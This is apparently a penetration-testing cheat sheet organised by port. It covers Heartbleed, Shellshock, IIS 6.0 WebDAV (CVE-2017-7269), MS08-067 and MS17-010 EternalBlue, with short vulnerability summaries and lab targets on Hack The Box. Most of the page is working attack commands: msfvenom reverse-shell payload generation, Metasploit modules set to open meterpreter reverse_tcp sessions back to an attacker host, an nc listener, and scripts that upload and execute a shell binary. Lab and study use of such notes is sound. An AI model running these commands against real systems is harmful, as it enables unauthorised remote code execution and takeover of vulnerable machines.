Attacks

HTTPS (443/tcp)

Heartbleed

Heartbleed Bug | OWASP
Heartbleed Bug
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.

Scan

NSE Script
1
nmap --script vuln -oA vulnscan 10.10.10.79 -p443
Copied!
SSLyze
1
sslyze --heartbleed 10.10.10.79
Copied!
sslyze | Kali Linux Tools
Kali Linux

Exploit

1
python heartbleed.py 10.10.10.79
Copied!

Web (80/tcp)

Shellshock

oss-sec: Re: CVE-2014-6271: remote code execution through bash
PentesterLab: CVE-2014-6271/Shellshock

Scan

1
[email protected]:~# locate -r '\.nse#x27; | grep -i shellshock
2
/usr/share/nmap/scripts/http-shellshock.nse
3
4
nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
Copied!

Exploit

Microsoft IIS 6.0 (CVE:2017-7269)

CVE - CVE-2017-7269
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
GitHub - danigargu/explodingcan: An implementation of NSA's ExplodingCan exploit in Python
GitHub
1
msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.14.21 LPORT=4444 >shellcode
2
3
msf > use exploit/multi/handler
4
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
5
msf exploit(handler) > set lhost 10.10.14.5
6
msf exploit(handler) > set lport 4444
7
msf exploit(handler) > exploit
8
9
python explodingcan.py http://10.10.10.14 shellcode
Copied!
You can test it on Hack the box "Grandpa": - OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition - OS Version: 5.2.3790 Service Pack 2 Build 3790 - Hotfix(s): N/A

SMB (139,445)

MS08-067

Microsoft Security Bulletin MS08-067 - Critical
docsmsft

Metasploit

MS08-067 Microsoft Server Service Relative Path Stack Corruption
Rapid7
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
1
msf > use exploit/windows/smb/ms08_067_netapi
2
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
3
msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
4
msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.14.21
5
msf exploit(windows/smb/ms08_067_netapi) > run
Copied!
You can test it on Hack the box "Legacy": - OS Name: Microsoft Windows XP Professional - OS Version: 5.1.2600 Service Pack 3 Build 2600 - Hotfix(s): Q147222

MS17-010

Microsoft Security Bulletin MS17-010 - Critical
docsmsft

Manual

GitHub - helviojunior/MS17-010: MS17-010
GitHub
1
git clone https://github.com/helviojunior/MS17-010
2
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
3
nc -nlvp 4444
4
python send_and_execute.py 10.10.10.4 ../shell.exe
Copied!
You can test it on Hack the box "Legacy": - OS Name: Microsoft Windows XP Professional - OS Version: 5.1.2600 Service Pack 3 Build 2600 - Hotfix(s): Q147222

Metasploit

MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Rapid7
This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.
1
msf > use exploit/windows/smb/ms17_010_eternalblue
2
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
3
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
4
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
5
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
Copied!
You can test it on Hack the box "Blue": - OS Name: Microsoft Windows 7 Professional - OS Version: 6.1.7601 Service Pack 1 Build 7601 - Hotfix(s): 200 Hotfix(s) Installed. [01]: KB2849697 [02]: KB2849696 [03]: KB2841134
Last modified 1yr ago